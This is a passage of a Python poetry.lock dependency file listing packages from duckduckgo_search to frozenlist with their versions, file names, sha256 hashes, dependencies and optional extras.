"sha256:4b462333378e9f78e138eccd73a315a54cb5208ebb07ab4ec179d9d18b2998b5"}, {file = "duckduckgo_search-3.9.3.tar.gz", hash = "sha256:f68aca605827df4e6b5b4ab00f9a891e103ec30809de092af42e885a617ab5ba"}, ] [package.dependencies] aiofiles = ">=23.2.1" click = ">=8.1.7" httpx = {version = ">=0.25.0", extras = ["brotli", "http2", "socks"]} lxml = ">=4.9.3" [package.extras] dev = ["black (>=23.9.1)", "isort (>=5.12.0)", "pytest (>=7.4.2)", "pytest-asyncio (>=0.21.1)", "ruff (>=0.0.291)"] [[package]] name = "elastic-transport" version = "8.4.1" description = "Transport classes and utilities shared among Python Elastic client libraries" optional = true python-versions = ">=3.6" files = [ {file = "elastic-transport-8.4.1.tar.gz", hash = "sha256:e5548997113c5d9566c9a1a51ed67bce50a4871bc0e44b692166461279e4167e"}, {file = "elastic_transport-8.4.1-py3-none-any.whl", hash = "sha256:c718ce40e8217b6045604961463c10da69a152dda07af4e25b3feae8d7965fc0"}, ] [package.dependencies] certifi = "*" urllib3 = ">=1.26.2,<2" [package.extras] develop = ["aiohttp", "furo", "mock", "pytest", "pytest-asyncio", "pytest-cov", "pytest-httpserver", "pytest-mock", "requests", "sphinx (>2)", "sphinx-autodoc-typehints", "trustme"] [[package]] name = "elasticsearch" version = "8.10.1" description = "Python client for Elasticsearch" optional = true python-versions = ">=3.6, <4" files = [ {file = "elasticsearch-8.10.1-py3-none-any.whl", hash = "sha256:68141d42d10c7f67ac466ca00496830d3b81a7e9476c3baa5585060832c60c69"}, {file = "elasticsearch-8.10.1.tar.gz", hash = "sha256:2cb56b433daa2d3ef1aaa2e5a5eacd36ba1d66884722f3d7759a4f9d16190059"}, ] [package.dependencies] elastic-transport = ">=8,<9" [package.extras] async = ["aiohttp (>=3,<4)"] requests = ["requests (>=2.4.0,<3.0.0)"] [[package]] name = "entrypoints" version = "0.4" description = "Discover and load entry points from installed packages." 
optional = true python-versions = ">=3.6" files = [ {file = "entrypoints-0.4-py3-none-any.whl", hash = "sha256:f174b5ff827504fd3cd97cc3f8649f3693f51538c7e4bdf3ef002c8429d42f9f"}, {file = "entrypoints-0.4.tar.gz", hash = "sha256:b706eddaa9218a19ebcd67b56818f05bb27589b1ca9e8d797b74affad4ccacd4"}, ] [[package]] name = "esprima" version = "4.0.1" description = "ECMAScript parsing infrastructure for multipurpose analysis in Python" optional = true python-versions = "*" files = [ {file = "esprima-4.0.1.tar.gz", hash = "sha256:08db1a876d3c2910db9cfaeb83108193af5411fc3a3a66ebefacd390d21323ee"}, ] [[package]] name = "exceptiongroup" version = "1.1.3" description = "Backport of PEP 654 (exception groups)" optional = false python-versions = ">=3.7" files = [ {file = "exceptiongroup-1.1.3-py3-none-any.whl", hash = "sha256:343280667a4585d195ca1cf9cef84a4e178c4b6cf2274caef9859782b567d5e3"}, {file = "exceptiongroup-1.1.3.tar.gz", hash = "sha256:097acd85d473d75af5bb98e41b61ff7fe35efe6675e4f9370ec6ec5126d160e9"}, ] [package.extras] test = ["pytest (>=6)"] [[package]] name = "executing" version = "2.0.0" description = "Get the currently executing AST node of a frame, and other information" optional = false python-versions = "*" files = [ {file = "executing-2.0.0-py2.py3-none-any.whl", hash = "sha256:06df6183df67389625f4e763921c6cf978944721abf3e714000200aab95b0657"}, {file = "executing-2.0.0.tar.gz", hash = "sha256:0ff053696fdeef426cda5bd18eacd94f82c91f49823a2e9090124212ceea9b08"}, ] [package.extras] tests = ["asttokens (>=2.1.0)", "coverage", "coverage-enable-subprocess", "ipython", "littleutils", "pytest", "rich"] [[package]] name = "faiss-cpu" version = "1.7.4" description = "A library for efficient similarity search and clustering of dense vectors." optional = true python-versions = "*" files = [ {file = "faiss-cpu-1.7.4.tar.gz", hash = "sha256:265dc31b0c079bf4433303bf6010f73922490adff9188b915e2d3f5e9c82dd0a"}, {file = "faiss_cpu-1.7.4-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:50d4ebe7f1869483751c558558504f818980292a9b55be36f9a1ee1009d9a686"}, {file = "faiss_cpu-1.7.4-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:7b1db7fae7bd8312aeedd0c41536bcd19a6e297229e1dce526bde3a73ab8c0b5"}, {file = "faiss_cpu-1.7.4-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:17b7fa7194a228a84929d9e6619d0e7dbf00cc0f717e3462253766f5e3d07de8"}, {file = "faiss_cpu-1.7.4-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dca531952a2e3eac56f479ff22951af4715ee44788a3fe991d208d766d3f95f3"}, {file = "faiss_cpu-1.7.4-cp310-cp310-win_amd64.whl", hash = "sha256:7173081d605e74766f950f2e3d6568a6f00c53f32fd9318063e96728c6c62821"}, {file = "faiss_cpu-1.7.4-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:d0bbd6f55d7940cc0692f79e32a58c66106c3c950cee2341b05722de9da23ea3"}, {file = "faiss_cpu-1.7.4-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e13c14280376100f143767d0efe47dcb32618f69e62bbd3ea5cd38c2e1755926"}, {file = "faiss_cpu-1.7.4-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c521cb8462f3b00c0c7dfb11caff492bb67816528b947be28a3b76373952c41d"}, {file = "faiss_cpu-1.7.4-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:afdd9fe1141117fed85961fd36ee627c83fc3b9fd47bafb52d3c849cc2f088b7"}, {file = "faiss_cpu-1.7.4-cp311-cp311-win_amd64.whl", hash = "sha256:2ff7f57889ea31d945e3b87275be3cad5d55b6261a4e3f51c7aba304d76b81fb"}, {file = "faiss_cpu-1.7.4-cp37-cp37m-macosx_10_9_x86_64.whl", hash = 
"sha256:eeaf92f27d76249fb53c1adafe617b0f217ab65837acf7b4ec818511caf6e3d8"}, {file = "faiss_cpu-1.7.4-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:102b1bd763e9b0c281ac312590af3eaf1c8b663ccbc1145821fe6a9f92b8eaaf"}, {file = "faiss_cpu-1.7.4-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5512da6707c967310c46ff712b00418b7ae28e93cb609726136e826e9f2f14fa"}, {file = "faiss_cpu-1.7.4-cp37-cp37m-win_amd64.whl", hash = "sha256:0c2e5b9d8c28c99f990e87379d5bbcc6c914da91ebb4250166864fd12db5755b"}, {file = "faiss_cpu-1.7.4-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:43f67f325393145d360171cd98786fcea6120ce50397319afd3bb78be409fb8a"}, {file = "faiss_cpu-1.7.4-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:6a4e4af194b8fce74c4b770cad67ad1dd1b4673677fc169723e4c50ba5bd97a8"}, {file = "faiss_cpu-1.7.4-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:31bfb7b9cffc36897ae02a983e04c09fe3b8c053110a287134751a115334a1df"}, {file = "faiss_cpu-1.7.4-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:52d7de96abef2340c0d373c1f5cbc78026a3cebb0f8f3a5920920a00210ead1f"}, {file = "faiss_cpu-1.7.4-cp38-cp38-win_amd64.whl", hash = "sha256:699feef85b23c2c729d794e26ca69bebc0bee920d676028c06fd0e0becc15c7e"}, {file = "faiss_cpu-1.7.4-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:559a0133f5ed44422acb09ee1ac0acffd90c6666d1bc0d671c18f6e93ad603e2"}, {file = "faiss_cpu-1.7.4-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:ea1d71539fe3dc0f1bed41ef954ca701678776f231046bf0ca22ccea5cf5bef6"}, {file = "faiss_cpu-1.7.4-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:12d45e0157024eb3249842163162983a1ac8b458f1a8b17bbf86f01be4585a99"}, {file = "faiss_cpu-1.7.4-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2f0eab359e066d32c874f51a7d4bf6440edeec068b7fe47e6d803c73605a8b4c"}, {file = "faiss_cpu-1.7.4-cp39-cp39-win_amd64.whl", hash = "sha256:98459ceeeb735b9df1a5b94572106ffe0a6ce740eb7e4626715dd218657bb4dc"}, ] [[package]] name = "fastavro" version = "1.8.2" description = "Fast read/write of AVRO files" optional = true python-versions = ">=3.8" files = [ {file = "fastavro-1.8.2-cp310-cp310-macosx_11_0_x86_64.whl", hash = "sha256:0e08964b2e9a455d831f2557402a683d4c4d45206f2ab9ade7c69d3dc14e0e58"}, {file = "fastavro-1.8.2-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:401a70b1e5c7161420c6019e0c8afa88f7c8a373468591f5ec37639a903c2509"}, {file = "fastavro-1.8.2-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:eef1ed3eaa4240c05698d02d8d0c010b9a03780eda37b492da6cd4c9d37e04ec"}, {file = "fastavro-1.8.2-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:543185a672ff6306beb329b57a7b8a3a2dd1eb21a5ccc530150623d58d48bb98"}, {file = "fastavro-1.8.2-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:ffbf8bae1edb50fe7beeffc3afa8e684686550c2e5d31bf01c25cfa213f581e1"}, {file = "fastavro-1.8.2-cp310-cp310-win_amd64.whl", hash = "sha256:bb545eb9d876bc7b785e27e98e7720ada7eee7d7a1729798d2ed51517f13500a"}, {file = "fastavro-1.8.2-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:2b837d3038c651046252bc92c1b9899bf21c7927a148a1ff89599c36c2a331ca"}, {file = "fastavro-1.8.2-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d3510e96c0a47e4e914bd1a29c954eb662bfa24849ad92e597cb97cc79f21af7"}, {file = "fastavro-1.8.2-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = 
"sha256:ccc0e74f2c2ab357f39bb73d67fcdb6dc10e23fdbbd399326139f72ec0fb99a3"}, {file = "fastavro-1.8.2-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:add51c70d0ab1175601c75cd687bbe9d16ae312cd8899b907aafe0d79ee2bc1d"}, {file = "fastavro-1.8.2-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:d9e2662f57e6453e9a2c9fb4f54b2a9e62e3e46f5a412ac00558112336d23883"}, {file = "fastavro-1.8.2-cp311-cp311-win_amd64.whl", hash = "sha256:fea75cf53a93c56dd56e68abce8d314ef877b27451c870cd7ede7582d34c08a7"}, {file = "fastavro-1.8.2-cp38-cp38-macosx_11_0_x86_64.whl", hash = "sha256:f489020bb8664c2737c03457ad5dbd490579ddab6f0a7b5c17fecfe982715a89"}, {file = "fastavro-1.8.2-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a547625c138efd5e61300119241041906ee8cb426fc7aa789900f87af7ed330d"}, {file = "fastavro-1.8.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:53beb458f30c9ad4aa7bff4a42243ff990ffb713b6ce0cd9b360cbc3d648fe52"}, {file = "fastavro-1.8.2-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:7b1b2cbd2dd851452306beed0ab9bdaeeab1cc8ad46f84b47cd81eeaff6dd6b8"}, {file = "fastavro-1.8.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:d29e9baee0b2f37ecd09bde3b487cf900431fd548c85be3e4fe1b9a0b2a917f1"}, {file = "fastavro-1.8.2-cp38-cp38-win_amd64.whl", hash = "sha256:66e132c710663230292bc63e2cb79cf95b16ccb94a5fc99bb63694b24e312fc5"}, {file = "fastavro-1.8.2-cp39-cp39-macosx_11_0_x86_64.whl", hash = "sha256:38aca63ce604039bcdf2edd14912d00287bdbf8b76f9aa42b28e6ca0bf950092"}, {file = "fastavro-1.8.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9787835f6449ee94713e7993a700432fce3763024791ffa8a58dc91ef9d1f950"}, {file = "fastavro-1.8.2-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:536cb448bc83811056be02749fd9df37a69621678f02597d272970a769e9b40c"}, {file = "fastavro-1.8.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:e9d5027cf7d9968f8f819958b41bfedb933323ea6d6a0485eefacaa1afd91f54"}, {file = "fastavro-1.8.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:792adfc0c80c7f1109e0ab4b0decef20691fdf0a45091d397a0563872eb56d42"}, {file = "fastavro-1.8.2-cp39-cp39-win_amd64.whl", hash = "sha256:650b22766259f7dd7519dfa4e4658f0e233c319efa130b9cf0c36a500e09cc57"}, {file = "fastavro-1.8.2.tar.gz", hash = "sha256:ab9d9226d4b66b6b3d0661a57cd45259b0868fed1c0cd4fac95249b9e0973320"}, ] [package.extras] codecs = ["lz4", "python-snappy", "zstandard"] lz4 = ["lz4"] snappy = ["python-snappy"] zstandard = ["zstandard"] [[package]] name = "fastjsonschema" version = "2.18.1" description = "Fastest Python implementation of JSON schema" optional = false python-versions = "*" files = [ {file = "fastjsonschema-2.18.1-py3-none-any.whl", hash = "sha256:aec6a19e9f66e9810ab371cc913ad5f4e9e479b63a7072a2cd060a9369e329a8"}, {file = "fastjsonschema-2.18.1.tar.gz", hash = "sha256:06dc8680d937628e993fa0cd278f196d20449a1adc087640710846b324d422ea"}, ] [package.extras] devel = ["colorama", "json-spec", "jsonschema", "pylint", "pytest", "pytest-benchmark", "pytest-cache", "validictory"] [[package]] name = "feedfinder2" version = "0.0.4" description = "Find the feed URLs for a website." 
optional = true python-versions = "*" files = [ {file = "feedfinder2-0.0.4.tar.gz", hash = "sha256:3701ee01a6c85f8b865a049c30ba0b4608858c803fe8e30d1d289fdbe89d0efe"}, ] [package.dependencies] beautifulsoup4 = "*" requests = "*" six = "*" [[package]] name = "feedparser" version = "6.0.10" description = "Universal feed parser, handles RSS 0.9x, RSS 1.0, RSS 2.0, CDF, Atom 0.3, and Atom 1.0 feeds" optional = true python-versions = ">=3.6" files = [ {file = "feedparser-6.0.10-py3-none-any.whl", hash = "sha256:79c257d526d13b944e965f6095700587f27388e50ea16fd245babe4dfae7024f"}, {file = "feedparser-6.0.10.tar.gz", hash = "sha256:27da485f4637ce7163cdeab13a80312b93b7d0c1b775bef4a47629a3110bca51"}, ] [package.dependencies] sgmllib3k = "*" [[package]] name = "filelock" version = "3.13.0" description = "A platform independent file lock." optional = true python-versions = ">=3.8" files = [ {file = "filelock-3.13.0-py3-none-any.whl", hash = "sha256:a552f4fde758f4eab33191e9548f671970f8b06d436d31388c9aa1e5861a710f"}, {file = "filelock-3.13.0.tar.gz", hash = "sha256:63c6052c82a1a24c873a549fbd39a26982e8f35a3016da231ead11a5be9dad44"}, ] [package.extras] docs = ["furo (>=2023.9.10)", "sphinx (>=7.2.6)", "sphinx-autodoc-typehints (>=1.24)"] testing = ["covdefaults (>=2.3)", "coverage (>=7.3.2)", "diff-cover (>=8)", "pytest (>=7.4.3)", "pytest-cov (>=4.1)", "pytest-mock (>=3.12)", "pytest-timeout (>=2.2)"] typing = ["typing-extensions (>=4.8)"] [[package]] name = "fiona" version = "1.9.5" description = "Fiona reads and writes spatial data files" optional = true python-versions = ">=3.7" files = [ {file = "fiona-1.9.5-cp310-cp310-macosx_10_15_x86_64.whl", hash = "sha256:5f40a40529ecfca5294260316cf987a0420c77a2f0cf0849f529d1afbccd093e"}, {file = "fiona-1.9.5-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:374efe749143ecb5cfdd79b585d83917d2bf8ecfbfc6953c819586b336ce9c63"}, {file = "fiona-1.9.5-cp310-cp310-manylinux2014_x86_64.whl", hash = "sha256:35dae4b0308eb44617cdc4461ceb91f891d944fdebbcba5479efe524ec5db8de"}, {file = "fiona-1.9.5-cp310-cp310-win_amd64.whl", hash = "sha256:5b4c6a3df53bee8f85bb46685562b21b43346be1fe96419f18f70fa1ab8c561c"}, {file = "fiona-1.9.5-cp311-cp311-macosx_10_15_x86_64.whl", hash = "sha256:6ad04c1877b9fd742871b11965606c6a52f40706f56a48d66a87cc3073943828"}, {file = "fiona-1.9.5-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:9fb9a24a8046c724787719e20557141b33049466145fc3e665764ac7caf5748c"}, {file = "fiona-1.9.5-cp311-cp311-manylinux2014_x86_64.whl", hash = "sha256:d722d7f01a66f4ab6cd08d156df3fdb92f0669cf5f8708ddcb209352f416f241"}, {file = "fiona-1.9.5-cp311-cp311-win_amd64.whl", hash = "sha256:7ede8ddc798f3d447536080c6db9a5fb73733ad8bdb190cb65eed4e289dd4c50"}, {file = "fiona-1.9.5-cp312-cp312-macosx_10_15_x86_64.whl", hash = "sha256:8b098054a27c12afac4f819f98cb4d4bf2db9853f70b0c588d7d97d26e128c39"}, {file = "fiona-1.9.5-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:6d9f29e9bcbb33232ff7fa98b4a3c2234db910c1dc6c4147fc36c0b8b930f2e0"}, {file = "fiona-1.9.5-cp312-cp312-manylinux2014_x86_64.whl", hash = "sha256:f1af08da4ecea5036cb81c9131946be4404245d1b434b5b24fd3871a1d4030d9"}, {file = "fiona-1.9.5-cp312-cp312-win_amd64.whl", hash = "sha256:c521e1135c78dec0d7774303e5a1b4c62e0efb0e602bb8f167550ef95e0a2691"}, {file = "fiona-1.9.5-cp37-cp37m-macosx_10_15_x86_64.whl", hash = "sha256:fce4b1dd98810cabccdaa1828430c7402d283295c2ae31bea4f34188ea9e88d7"}, {file = "fiona-1.9.5-cp37-cp37m-manylinux2014_x86_64.whl", hash = 
"sha256:3ea04ec2d8c57b5f81a31200fb352cb3242aa106fc3e328963f30ffbdf0ff7c8"}, {file = "fiona-1.9.5-cp37-cp37m-win_amd64.whl", hash = "sha256:4877cc745d9e82b12b3eafce3719db75759c27bd8a695521202135b36b58c2e7"}, {file = "fiona-1.9.5-cp38-cp38-macosx_10_15_x86_64.whl", hash = "sha256:ac2c250f509ec19fad7959d75b531984776517ef3c1222d1cc5b4f962825880b"}, {file = "fiona-1.9.5-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:4df21906235928faad856c288cfea0298e9647f09c9a69a230535cbc8eadfa21"}, {file = "fiona-1.9.5-cp38-cp38-manylinux2014_x86_64.whl", hash = "sha256:81d502369493687746cb8d3cd77e5ada4447fb71d513721c9a1826e4fb32b23a"}, {file = "fiona-1.9.5-cp38-cp38-win_amd64.whl", hash = "sha256:ce3b29230ef70947ead4e701f3f82be81082b7f37fd4899009b1445cc8fc276a"}, {file = "fiona-1.9.5-cp39-cp39-macosx_10_15_x86_64.whl", hash = "sha256:8b53ce8de773fcd5e2e102e833c8c58479edd8796a522f3d83ef9e08b62bfeea"}, {file = "fiona-1.9.5-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:bd2355e859a1cd24a3e485c6dc5003129f27a2051629def70036535ffa7e16a4"}, {file = "fiona-1.9.5-cp39-cp39-manylinux2014_x86_64.whl", hash = "sha256:9a2da52f865db1aff0eaf41cdd4c87a7c079b3996514e8e7a1ca38457309e825"}, {file = "fiona-1.9.5-cp39-cp39-win_amd64.whl", hash = "sha256:cfef6db5b779d463298b1113b50daa6c5b55f26f834dc9e37752116fa17277c1"}, {file = "fiona-1.9.5.tar.gz", hash = "sha256:99e2604332caa7692855c2ae6ed91e1fffdf9b59449aa8032dd18e070e59a2f7"}, ] [package.dependencies] attrs = ">=19.2.0" certifi = "*" click = ">=8.0,<9.0" click-plugins = ">=1.0" cligj = ">=0.5" importlib-metadata = {version = "*", markers = "python_version < \"3.10\""} setuptools = "*" six = "*" [package.extras] all = ["Fiona[calc,s3,test]"] calc = ["shapely"] s3 = ["boto3 (>=1.3.1)"] test = ["Fiona[s3]", "pytest (>=7)", "pytest-cov", "pytz"] [[package]] name = "flatbuffers" version = "23.5.26" description = "The FlatBuffers serialization format for Python" optional = true python-versions = "*" files = [ {file = "flatbuffers-23.5.26-py2.py3-none-any.whl", hash = "sha256:c0ff356da363087b915fde4b8b45bdda73432fc17cddb3c8157472eab1422ad1"}, {file = "flatbuffers-23.5.26.tar.gz", hash = "sha256:9ea1144cac05ce5d86e2859f431c6cd5e66cd9c78c558317c7955fb8d4c78d89"}, ] [[package]] name = "fqdn" version = "1.5.1" description = "Validates fully-qualified domain names against RFC 1123, so that they are acceptable to modern bowsers" optional = false python-versions = ">=2.7, !=3.0, !=3.1, !=3.2, !=3.3, !=3.4, <4" files = [ {file = "fqdn-1.5.1-py3-none-any.whl", hash = "sha256:3a179af3761e4df6eb2e026ff9e1a3033d3587bf980a0b1b2e1e5d08d7358014"}, {file = "fqdn-1.5.1.tar.gz", hash = "sha256:105ed3677e767fb5ca086a0c1f4bb66ebc3c100be518f0e0d755d9eae164d89f"}, ] [[package]] name = "freezegun" version = "1.2.2" description = "Let your Python tests travel through time" optional = false python-versions = ">=3.6" files = [ {file = "freezegun-1.2.2-py3-none-any.whl", hash = "sha256:ea1b963b993cb9ea195adbd893a48d573fda951b0da64f60883d7e988b606c9f"}, {file = "freezegun-1.2.2.tar.gz", hash = "sha256:cd22d1ba06941384410cd967d8a99d5ae2442f57dfafeff2fda5de8dc5c05446"}, ] [package.dependencies] python-dateutil = ">=2.7" [[package]] name = "frozenlist" version = "1.4.0" description = "A list-like structure which implements collections.abc.MutableSequence" optional = false python-versions = ">=3.8" files = [ {file = "frozenlist-1.4.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:764226ceef3125e53ea2cb275000e309c0aa5464d43bd72abd661e27fffc26ab"}, {file = 
"frozenlist-1.4.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d6484756b12f40003c6128bfcc3fa9f0d49a687e171186c2d85ec82e3758c559"}, {file = "frozenlist-1.4.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:9ac08e601308e41eb533f232dbf6b7e4cea762f9f84f6357136eed926c15d12c"}, {file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d081f13b095d74b67d550de04df1c756831f3b83dc9881c38985834387487f1b"}, {file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:71932b597f9895f011f47f17d6428252fc728ba2ae6024e13c3398a087c2cdea"}, {file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:981b9ab5a0a3178ff413bca62526bb784249421c24ad7381e39d67981be2c326"}, {file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:e41f3de4df3e80de75845d3e743b3f1c4c8613c3997a912dbf0229fc61a8b963"}, {file = "frozenlist-1.4.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6918d49b1f90821e93069682c06ffde41829c346c66b721e65a5c62b4bab0300"}, {file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:0e5c8764c7829343d919cc2dfc587a8db01c4f70a4ebbc49abde5d4b158b007b"}, {file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:8d0edd6b1c7fb94922bf569c9b092ee187a83f03fb1a63076e7774b60f9481a8"}, {file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:e29cda763f752553fa14c68fb2195150bfab22b352572cb36c43c47bedba70eb"}, {file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:0c7c1b47859ee2cac3846fde1c1dc0f15da6cec5a0e5c72d101e0f83dcb67ff9"}, {file = "frozenlist-1.4.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:901289d524fdd571be1c7be054f48b1f88ce8dddcbdf1ec698b27d4b8b9e5d62"}, {file = "frozenlist-1.4.0-cp310-cp310-win32.whl", hash = "sha256:1a0848b52815006ea6596c395f87449f693dc419061cc21e970f139d466dc0a0"}, {file = "frozenlist-1.4.0-cp310-cp310-win_amd64.whl", hash = "sha256:b206646d176a007466358aa21d85cd8600a415c67c9bd15403336c331a10d956"}, {file = "frozenlist-1.4.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:de343e75f40e972bae1ef6090267f8260c1446a1695e77096db6cfa25e759a95"}, {file = "frozenlist-1.4.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ad2a9eb6d9839ae241701d0918f54c51365a51407fd80f6b8289e2dfca977cc3"}, {file = "frozenlist-1.4.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:bd7bd3b3830247580de99c99ea2a01416dfc3c34471ca1298bccabf86d0ff4dc"}, {file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bdf1847068c362f16b353163391210269e4f0569a3c166bc6a9f74ccbfc7e839"}, {file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:38461d02d66de17455072c9ba981d35f1d2a73024bee7790ac2f9e361ef1cd0c"}, {file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d5a32087d720c608f42caed0ef36d2b3ea61a9d09ee59a5142d6070da9041b8f"}, {file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:dd65632acaf0d47608190a71bfe46b209719bf2beb59507db08ccdbe712f969b"}, {file = "frozenlist-1.4.0-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = 
"sha256:261b9f5d17cac914531331ff1b1d452125bf5daa05faf73b71d935485b0c510b"}, {file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:b89ac9768b82205936771f8d2eb3ce88503b1556324c9f903e7156669f521472"}, {file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:008eb8b31b3ea6896da16c38c1b136cb9fec9e249e77f6211d479db79a4eaf01"}, {file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:e74b0506fa5aa5598ac6a975a12aa8928cbb58e1f5ac8360792ef15de1aa848f"}, {file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:490132667476f6781b4c9458298b0c1cddf237488abd228b0b3650e5ecba7467"}, {file = "frozenlist-1.4.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:76d4711f6f6d08551a7e9ef28c722f4a50dd0fc204c56b4bcd95c6cc05ce6fbb"}, {file = "frozenlist-1.4.0-cp311-cp311-win32.whl", hash = "sha256:a02eb8ab2b8f200179b5f62b59757685ae9987996ae549ccf30f983f40602431"}, {file = "frozenlist-1.4.0-cp311-cp311-win_amd64.whl", hash = "sha256:515e1abc578dd3b275d6a5114030b1330ba044ffba03f94091842852f806f1c1"}, {file = "frozenlist-1.4.0-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:f0ed05f5079c708fe74bf9027e95125334b6978bf07fd5ab923e9e55e5fbb9d3"}, {file = "frozenlist-1.4.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ca265542ca427bf97aed183c1676e2a9c66942e822b14dc6e5f42e038f92a503"}, {file = "frozenlist-1.4.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:491e014f5c43656da08958808588cc6c016847b4360e327a62cb308c791bd2d9"}, {file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:17ae5cd0f333f94f2e03aaf140bb762c64783935cc764ff9c82dff626089bebf"}, {file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1e78fb68cf9c1a6aa4a9a12e960a5c9dfbdb89b3695197aa7064705662515de2"}, {file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d5655a942f5f5d2c9ed93d72148226d75369b4f6952680211972a33e59b1dfdc"}, {file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c11b0746f5d946fecf750428a95f3e9ebe792c1ee3b1e96eeba145dc631a9672"}, {file = "frozenlist-1.4.0-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e66d2a64d44d50d2543405fb183a21f76b3b5fd16f130f5c99187c3fb4e64919"}, {file = "frozenlist-1.4.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:88f7bc0fcca81f985f78dd0fa68d2c75abf8272b1f5c323ea4a01a4d7a614efc"}, {file = 